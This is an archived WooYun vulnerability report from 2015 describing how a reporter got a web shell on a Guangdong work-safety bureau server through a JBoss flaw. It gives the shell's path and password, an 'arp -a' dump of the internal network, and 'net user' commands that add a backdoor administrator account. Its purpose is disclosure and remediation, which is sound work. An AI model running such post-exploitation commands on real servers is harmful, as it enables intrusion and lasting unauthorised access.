当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150746

漏洞标题:广东安监局某系统配置不当已shell可入服务器可威胁内网

相关厂商:广东安监局

漏洞作者: 路人甲

提交时间:2015-10-30 22:51

修复时间:2015-12-18 17:34

公开时间:2015-12-18 17:34

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-30: 细节已通知厂商并且等待厂商处理中
2015-11-03: 厂商已经确认,细节仅向厂商公开
2015-11-13: 细节向核心白帽子及相关领域专家公开
2015-11-23: 细节向普通白帽子公开
2015-12-03: 细节向实习白帽子公开
2015-12-18: 细节向公众公开

简要描述:

已shell可入服务器可威胁内网

详细说明:

**.**.**.**/GdSafeWeb/
表面上看不出什么
通过jboss漏洞getshell进服务
一句话:**.**.**.**/jbossws13/index.jsp
密码:gainoverqq

QQ截图20151030214156.png


看得出来已经被shell了

QQ截图20151030214305.png


Command: arp -a
接口: **.**.**.** --- 0xb
Internet 地址 物理地址 类型
**.**.**.** 00-19-e8-d9-66-2c 动态
**.**.**.** 60-eb-69-c6-81-07 动态
**.**.**.** 00-21-9b-31-bc-28 动态
**.**.**.**01 00-26-55-de-3f-2e 动态
**.**.**.** ff-ff-ff-ff-ff-ff 静态
**.**.**.** 01-00-5e-00-00-02 静态
**.**.**.**2 01-00-5e-00-00-16 静态
**.**.**.**52 01-00-5e-00-00-fc 静态
**.**.**.** 01-00-5e-00-00-04 静态
**.**.**.** 01-00-5e-05-06-01 静态
**.**.**.** 01-00-5e-05-06-03 静态
**.**.**.** 01-00-5e-7b-0c-01 静态
**.**.**.** 01-00-5e-7f-02-03 静态
**.**.**.** ff-ff-ff-ff-ff-ff 静态
接口: **.**.**.** --- 0xc
Internet 地址 物理地址 类型
**.**.**.** 60-eb-69-c6-81-06 动态
**.**.**.** 38-bc-1a-c9-4d-a6 动态
**.**.**.** 60-eb-69-ce-e2-fb 动态
**.**.**.** 68-a0-f6-ce-6d-a5 动态
**.**.**.** 38-bc-1a-d9-cc-42 动态
**.**.**.** 68-a0-f6-ce-6d-a5 动态
**.**.**.** 58-7f-66-00-93-05 动态
**.**.**.** 38-bc-1a-d9-cc-42 动态
**.**.**.** 38-bc-1a-d9-cc-42 动态
**.**.**.** 0c-d6-bd-6b-76-9a 动态
**.**.**.** 38-bc-1a-d9-cc-42 动态
**.**.**.** 58-7f-66-00-93-05 动态
**.**.**.** 8c-34-fd-81-04-b5 动态
**.**.**.** 38-bc-1a-d9-cc-42 动态
**.**.**.** 68-df-dd-9f-4d-37 动态
**.**.**.** 68-df-dd-9f-4d-37 动态
**.**.**.** 58-7f-66-00-93-05 动态
**.**.**.** 38-bc-1a-d9-cc-42 动态
**.**.**.** 38-bc-1a-d9-cc-42 动态
**.**.**.** 38-bc-1a-d9-cc-42 动态
**.**.**.** c4-7d-4f-ec-2c-c0 动态
**.**.**.** ff-ff-ff-ff-ff-ff 静态
**.**.**.** 01-00-5e-00-00-02 静态
**.**.**.**2 01-00-5e-00-00-16 静态
**.**.**.**52 01-00-5e-00-00-fc 静态
**.**.**.** 01-00-5e-01-02-03 静态
**.**.**.** 01-00-5e-00-00-04 静态
**.**.**.** 01-00-5e-01-02-07 静态
**.**.**.** 01-00-5e-05-06-01 静态
**.**.**.** 01-00-5e-05-06-03 静态
**.**.**.** 01-00-5e-7b-0c-01 静态
**.**.**.** 01-00-5e-7f-02-03 静态


可威胁内网

QQ截图20151030214411.png

漏洞证明:

QQ截图20151030214502.png


QQ截图20151030214517.png


QQ截图20151030214552.png


net user wooyun 1woo@yun /add
net localgroup administrators wooyun /add


QQ截图20151030214820.png


3389没关

QQ截图20151030214905.png


QQ截图20151030215321.png


安监局 你懂的

修复方案:

删除shell,正确配置jboss

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-03 17:32

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无